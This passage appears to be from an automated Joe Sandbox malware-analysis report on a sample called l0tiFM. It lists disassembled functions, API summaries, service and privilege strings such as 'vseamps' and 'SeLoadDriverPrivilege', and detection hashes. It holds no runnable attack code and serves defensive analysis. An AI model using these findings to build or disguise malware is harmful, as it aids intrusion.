                                                                                                                control_flow_graph 25 7ffbc3201c00-7ffbc3201c06 26 7ffbc3201c08-7ffbc3201c0b 25->26 27 7ffbc3201c41-7ffbc3201c4b 25->27 29 7ffbc3201c35-7ffbc3201c74 call 7ffbc3202470 26->29 30 7ffbc3201c0d-7ffbc3201c10 26->30 28 7ffbc3201d68-7ffbc3201d7d 27->28 34 7ffbc3201d7f 28->34 35 7ffbc3201d8c-7ffbc3201da6 call 7ffbc3202304 28->35 47 7ffbc3201c7a-7ffbc3201c8f call 7ffbc3202304 29->47 48 7ffbc3201d42 29->48 32 7ffbc3201c28 __scrt_dllmain_crt_thread_attach 30->32 33 7ffbc3201c12-7ffbc3201c15 30->33 36 7ffbc3201c2d-7ffbc3201c34 32->36 38 7ffbc3201c17-7ffbc3201c20 33->38 39 7ffbc3201c21-7ffbc3201c26 call 7ffbc32023b4 33->39 40 7ffbc3201d81-7ffbc3201d8b 34->40 45 7ffbc3201da8-7ffbc3201dd9 call 7ffbc320242c call 7ffbc32022d4 call 7ffbc32027b4 call 7ffbc32025d0 call 7ffbc32025f4 call 7ffbc320245c 35->45 46 7ffbc3201ddb-7ffbc3201e0c call 7ffbc3202630 35->46 39->36 45->40 57 7ffbc3201e0e-7ffbc3201e14 46->57 58 7ffbc3201e1d-7ffbc3201e23 46->58 60 7ffbc3201d5a-7ffbc3201d67 call 7ffbc3202630 47->60 61 7ffbc3201c95-7ffbc3201ca6 call 7ffbc3202374 47->61 51 7ffbc3201d44-7ffbc3201d59 48->51 57->58 62 7ffbc3201e16-7ffbc3201e18 57->62 63 7ffbc3201e65-7ffbc3201e6d call 7ffbc3201720 58->63 64 7ffbc3201e25-7ffbc3201e2f 58->64 60->28 77 7ffbc3201ca8-7ffbc3201ccc call 7ffbc3202778 call 7ffbc32022c4 call 7ffbc32022e8 call 7ffbc3207b10 61->77 78 7ffbc3201cf7-7ffbc3201d01 call 7ffbc32025d0 61->78 68 7ffbc3201f02-7ffbc3201f0f 62->68 79 7ffbc3201e72-7ffbc3201e7b 63->79 69 7ffbc3201e36-7ffbc3201e3c 64->69 70 7ffbc3201e31-7ffbc3201e34 64->70 75 7ffbc3201e3e-7ffbc3201e44 69->75 70->75 84 7ffbc3201e4a-7ffbc3201e5f call 7ffbc3201c00 75->84 85 7ffbc3201ef8-7ffbc3201f00 75->85 77->78 127 7ffbc3201cce-7ffbc3201cd5 __scrt_dllmain_after_initialize_c 77->127 78->48 101 7ffbc3201d03-7ffbc3201d0f call 7ffbc3202620 78->101 80 7ffbc3201eb3-7ffbc3201eb5 79->80 81 7ffbc3201e7d-7ffbc3201e7f 79->81 90 7ffbc3201eb7-7ffbc3201eba 80->90 91 7ffbc3201ebc-7ffbc3201ed1 call 7ffbc3201c00 80->91 81->80 88 7ffbc3201e81-7ffbc3201ea3 call 7ffbc3201720 call 7ffbc3201d68 81->88 84->63 84->85 85->68 88->80 121 7ffbc3201ea5-7ffbc3201eaa 88->121 90->85 90->91 91->85 110 7ffbc3201ed3-7ffbc3201edd 91->110 112 7ffbc3201d35-7ffbc3201d40 101->112 113 7ffbc3201d11-7ffbc3201d1b call 7ffbc3202538 101->113 117 7ffbc3201ee4-7ffbc3201ef2 110->117 118 7ffbc3201edf-7ffbc3201ee2 110->118 112->51 113->112 126 7ffbc3201d1d-7ffbc3201d2b 113->126 122 7ffbc3201ef4 117->122 118->122 121->80 122->85 126->112 127->78 128 7ffbc3201cd7-7ffbc3201cf4 call 7ffbc3207acc 127->128 128->78
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                • String ID:
                                                                                                                • API String ID: 190073905-0
                                                                                                                • Opcode ID: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
                                                                                                                • Instruction ID: 200ba1eaccdb56bb8a39e9f9c3ebab91d682492d5e843a2ac4e892f0bbe45b50
                                                                                                                • Opcode Fuzzy Hash: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
                                                                                                                • Instruction Fuzzy Hash: C58168B5E0834346FE54BF75D541A7B63A0AF45780F9C4036EA0E6F692DE2CF9498780
                                                                                                                Function 00007FFBC3201720 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Concurrency::cancel_current_taskFree$ConsoleFileFindFirstLibrary
                                                                                                                • String ID: WordpadFilter.db
                                                                                                                • API String ID: 868324331-3647581008
                                                                                                                • Opcode ID: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
                                                                                                                • Instruction ID: efc89471d09b85c4e495e240cf211d7dcb704c5374d01f5d9737b1d73c5383d6
                                                                                                                • Opcode Fuzzy Hash: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
                                                                                                                • Instruction Fuzzy Hash: 65318072B15B4189EB00EFB1D8406AE73B5EB98788F584635EE8D27B44EF38D555C380
                                                                                                                Function 00007FFBC32011B0 Relevance: 3.2, APIs: 2, Instructions: 235COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 196 7ffbc32011b0-7ffbc3201207 197 7ffbc3201209-7ffbc3201222 call 7ffbc3211490 196->197 198 7ffbc320124b-7ffbc320124e 196->198 210 7ffbc3201224-7ffbc3201227 197->210 211 7ffbc320123e 197->211 199 7ffbc32014b8-7ffbc32014bf 198->199 200 7ffbc3201254-7ffbc3201280 198->200 204 7ffbc32014c3-7ffbc32014ea call 7ffbc3201b70 199->204 202 7ffbc32012f6-7ffbc3201335 call 7ffbc3201b90 call 7ffbc3210a50 200->202 203 7ffbc3201282-7ffbc320128f 200->203 231 7ffbc3201340-7ffbc32013cb 202->231 207 7ffbc3201295-7ffbc320129c 203->207 208 7ffbc32014f1-7ffbc32014f6 call 7ffbc3201a40 203->208 214 7ffbc32012c7-7ffbc32012cf call 7ffbc3201b90 207->214 215 7ffbc320129e-7ffbc32012a5 207->215 221 7ffbc32014f7-7ffbc32014ff call 7ffbc3201110 208->221 212 7ffbc3201241-7ffbc3201246 210->212 217 7ffbc3201229-7ffbc320123c call 7ffbc3211490 210->217 211->212 212->198 233 7ffbc32012d2-7ffbc32012f1 call 7ffbc3210e10 214->233 215->221 222 7ffbc32012ab-7ffbc32012b3 call 7ffbc3201b90 215->222 217->210 217->211 235 7ffbc32012b9-7ffbc32012c5 222->235 236 7ffbc32014eb-7ffbc32014f0 call 7ffbc32079cc 222->236 231->231 234 7ffbc32013d1-7ffbc32013da 231->234 233->202 239 7ffbc32013e0-7ffbc3201402 234->239 235->233 236->208 241 7ffbc3201404-7ffbc320140e 239->241 242 7ffbc3201411-7ffbc320142c 239->242 241->242 242->239 244 7ffbc320142e-7ffbc3201436 242->244 245 7ffbc3201498-7ffbc32014a6 244->245 246 7ffbc3201438-7ffbc320143b 244->246 247 7ffbc32014a8-7ffbc32014b5 call 7ffbc3201bcc 245->247 248 7ffbc32014b6 245->248 249 7ffbc3201440-7ffbc3201449 246->249 247->248 248->204 251 7ffbc3201455-7ffbc3201465 249->251 252 7ffbc320144b-7ffbc3201453 249->252 253 7ffbc3201467-7ffbc320146e 251->253 254 7ffbc3201470-7ffbc3201496 251->254 252->251 253->254 254->245 254->249
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                • String ID:
                                                                                                                • API String ID: 73155330-0
                                                                                                                • Opcode ID: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
                                                                                                                • Instruction ID: b5c6679d8abf1cf11a429dd6e243c46acffadc3ab6381ad13ab9c944b6361c89
                                                                                                                • Opcode Fuzzy Hash: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
                                                                                                                • Instruction Fuzzy Hash: 45816A76A1869246EA11AF35D8005BAA794FF56BC4F588335EF593B792DF3CF0928300

                                                                                                                Non-executed Functions

                                                                                                                Function 0000000140001A30 Relevance: 37.9, APIs: 30, Instructions: 422memorystringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$EnterLeave$Heap$AllocProcesslstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3526400053-0
                                                                                                                • Opcode ID: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
                                                                                                                • Instruction ID: dcb8fc7c666fd7128fde866f0540a8def7dae1288ec2bbf322971b46f3f62141
                                                                                                                • Opcode Fuzzy Hash: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
                                                                                                                • Instruction Fuzzy Hash: E3220F76211B4086E722DF26F840B9933A1F78CBE5F541226EB5A8B7B4DF3AC585C740
                                                                                                                Function 0000000140003F80 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 160timeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSectionServer$CreateErrorLastProcessTimerTokenWaitable$AdjustCloseContextCurrentDontEnterEventHandleInitializeLeaveListenLookupOpenPrivilegePrivilegesProtseqRegisterSerializeValueVersion
                                                                                                                • String ID: SeLoadDriverPrivilege$ampStartSingletone: logging started, settins=%s$null
                                                                                                                • API String ID: 3408796845-4213300970
                                                                                                                • Opcode ID: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
                                                                                                                • Instruction ID: 59d58333609de1a5812b0fd1fbb73637b4596d8d749a2627428b03e5fdfefd81
                                                                                                                • Opcode Fuzzy Hash: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
                                                                                                                • Instruction Fuzzy Hash: B19104B1224A4182EB12CF22F854BC633A5F78C7D4F445229FB9A4B6B4DF7AC159CB44
                                                                                                                Function 00000001400042B0 Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 59synchronizationtimethreadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$CloseHandle$DeleteEnterLeaveServer$CancelEventListeningMgmtObjectSingleStopTerminateThreadTimerUnregisterWaitWaitable
                                                                                                                • String ID: ampStopSingletone: logging ended
                                                                                                                • API String ID: 2048888615-3533855269
                                                                                                                • Opcode ID: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
                                                                                                                • Instruction ID: 72436faa0f880f3f140bbf81e9e476d17cd4b789f208762ad84a5967a0be411a
                                                                                                                • Opcode Fuzzy Hash: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
                                                                                                                • Instruction Fuzzy Hash: 85315178221A0192EB17DF27EC94BD82361E79CBE1F455111FB0A4B2B1CF7AC5898744
                                                                                                                Function 000000014000C3F0 Relevance: 29.0, APIs: 19, Instructions: 515COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
                                                                                                                • Instruction ID: 939e1951021ac32239a98278383650b1560c4a87fea8e277fdca239b4ddbef52
                                                                                                                • Opcode Fuzzy Hash: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
                                                                                                                • Instruction Fuzzy Hash: 3022CEB2625A8086EB22CF2BF445BEA77A0F78DBC4F444116FB4A476B5DB39C445CB00
                                                                                                                Function 0000000140001520 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 95COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastManagerOpen$FileModuleName
                                                                                                                • String ID: /remove$/service$vseamps
                                                                                                                • API String ID: 67513587-3839141145
                                                                                                                • Opcode ID: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
                                                                                                                • Instruction ID: ba5f49d8dd96f1c36e401cc1f7cdff7269c229e2e129f463089a9495e32f08e5
                                                                                                                • Opcode Fuzzy Hash: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
                                                                                                                • Instruction Fuzzy Hash: F031E9B2708B4086EB42DF67B84439AA3A1F78CBD4F480025FF5947B7AEE79C5558704
                                                                                                                Function 000000014000F000 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 152libraryloaderCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F042
                                                                                                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F05E
                                                                                                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F086
                                                                                                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F0A5
                                                                                                                • GetProcAddress.KERNEL32 ref: 000000014000F0F3
                                                                                                                • GetProcAddress.KERNEL32 ref: 000000014000F117
                                                                                                                  • Part of subcall function 00000001400073E0: LdrLoadDll.NTDLL ref: 00000001400073E2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$Load$Library
                                                                                                                • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                                                                                                • API String ID: 3981747205-232180764
                                                                                                                • Opcode ID: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
                                                                                                                • Instruction ID: 2f5902004a3f6de811dc5f380475ae1a3efdd32c0186a6d00da0f9ae6c345c7d
                                                                                                                • Opcode Fuzzy Hash: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
                                                                                                                • Instruction Fuzzy Hash: FE515CB561674181FE66EB63B850BFA2290BB8D7D0F484025BF4E4BBB1EF3DC445A210
                                                                                                                Function 00000001400022C0 Relevance: 15.1, APIs: 10, Instructions: 96threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateEvent$Thread$ClientCriticalCurrentImpersonateInitializeOpenRevertSectionSelfToken
                                                                                                                • String ID:
                                                                                                                • API String ID: 4284112124-0
                                                                                                                • Opcode ID: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
                                                                                                                • Instruction ID: d1cc2c0b88e239984ef66edc10b99dba483783d79de04edfe0f0364e5ac1fb7c
                                                                                                                • Opcode Fuzzy Hash: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
                                                                                                                • Instruction Fuzzy Hash: 65415D72604B408AE351CF66F88479EB7A0F78CB94F508129EB8A47B74CF79D595CB40
                                                                                                                Function 0000000140001430 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52serviceCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Service$CloseHandle$CreateErrorFileLastManagerModuleNameOpen
                                                                                                                • String ID: vseamps
                                                                                                                • API String ID: 3693165506-3944098904
                                                                                                                • Opcode ID: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
                                                                                                                • Instruction ID: 61898eac7960aa5413d410c65d13376abce5a62f28ec8a6c68938921ced9de71
                                                                                                                • Opcode Fuzzy Hash: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
                                                                                                                • Instruction Fuzzy Hash: F321FCB1204B8086EB56CF66F88439A73A4F78C784F544129E7894B774DF7DC149CB00
                                                                                                                Function 0000000140009300 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 154COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleFileNameA.KERNEL32(?,?,?,00000000,00000001,000000014000961C,?,?,?,?,?,?,0000000140009131,?,?,00000001), ref: 00000001400093CF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileModuleName
                                                                                                                • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                                • API String ID: 514040917-4022980321
                                                                                                                • Opcode ID: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
                                                                                                                • Instruction ID: eb4045a5a240d2828a775daba1198261b01968dd91f8e387fbd6cb4ec0284cf4
                                                                                                                • Opcode Fuzzy Hash: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
                                                                                                                • Instruction Fuzzy Hash: F851EFB131464042FB26DB2BB851BEA2391A78D7E0F484225BF2947AF2DF39C642C304
                                                                                                                Function 000000014000BB70 Relevance: 12.3, APIs: 8, Instructions: 256COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: String$ByteCharMultiWide$AllocErrorHeapLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 2057259594-0
                                                                                                                • Opcode ID: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
                                                                                                                • Instruction ID: f9b9a5bb90e2e08b647a9eb75fc4ff4e18af91537db3c322e1916602633d995e
                                                                                                                • Opcode Fuzzy Hash: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
                                                                                                                • Instruction Fuzzy Hash: B6A16AB22046808AEB66DF27E8407EA77E5F74CBE8F144625FB6947BE4DB78C5408700
                                                                                                                Function 0000000140005A70 Relevance: 12.2, APIs: 8, Instructions: 163memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$Process$Free$AllocInfoStartupVersion
                                                                                                                • String ID:
                                                                                                                • API String ID: 3103264659-0
                                                                                                                • Opcode ID: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
                                                                                                                • Instruction ID: 8fdcf1cc106887877eb8bf0912cd84dfc65bead55acac366e092854278e1a3ce
